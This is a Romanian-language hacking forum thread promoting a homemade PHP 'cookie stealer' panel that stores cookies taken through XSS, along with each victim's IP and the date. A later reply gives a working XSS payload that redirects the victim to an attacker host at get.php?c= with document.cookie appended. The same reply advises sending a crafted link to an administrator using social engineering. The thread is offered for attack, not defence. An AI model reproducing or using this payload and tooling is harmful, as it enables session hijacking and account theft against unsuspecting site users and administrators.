Jump to content
robyyxx

PHP Cookie Stealer

Recommended Posts

Posted

Pentru amatori de XSS va prezint un mic script PHP facut de mine care ajuta stocarea si vizualizarea cookie-urilor "furate".

Utilitati:

  • Login to view cookies
  • View cookies source
  • View the date when it was stolen
  • View IP of the user
  • Automatic remove dublicates
  • XSS/SQL protection

Screen:

cookie_stealer.png

http://s2.postimg.org/4cu536o5l/cookie_stealer.png

Instalare:

Trebuie editat "config.php" cu datele de la baza de date.

Trebuie editat "install.php" cu datele cu care vrem sa intram in cont

Rulam "install.php" apoi il stergem

Pentru a fura cookiul se face request pe "get.php?c="

Download

Sunt la inceput in PHP daca aveti sugestii despre cum as putea sa fac codul mai eficient si mai scurt as vrea sa le aud.

Initial aveam vreo 7 fisiere apoi le-am pus unul in altul unde mergea si am mai sters din surplus.

Posted
Mie nu îmi merge, adic? la tabelu "Cookie" apare "logged=ok" ?i domeniu... dar dac? dau la al?i, nu merge...

Tu sti sa-l folosesti? Sti ce inseamna a "fura" un cookie? Din cate vad tu ti-ai furat singur cookie-ul.

Edit:

Informeazate putin despre cum functioneaza toata treaba cu cookie si cum se pot fura.

Posted
Asa apare si la mine de ce oare ?

Ca sa furi un cookie:

Ai nevoie de o vulnerabilitate XSS pe care sa o folosesti pentru a executa javascript:

Mai exact

<script>
document.location="http://site-ul_tau.com/get.php?c=" + document.cookie;
</script>

Pentru a fura cookie-ul cuiva trebuie ca sa-l "pacalesti" sa execute codul (prin XSS)

Daca e persistent, traba merge usor. Daca nu, il poti folosi, trimitandu-l la prosti doar daca e prin get (desi nu recomand asta).

Treaba merge bine daca creezi linkul cu parametru ce va executa javascriptul de mai sus si apoi il trimiti unui administrator cu ceva SE.

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...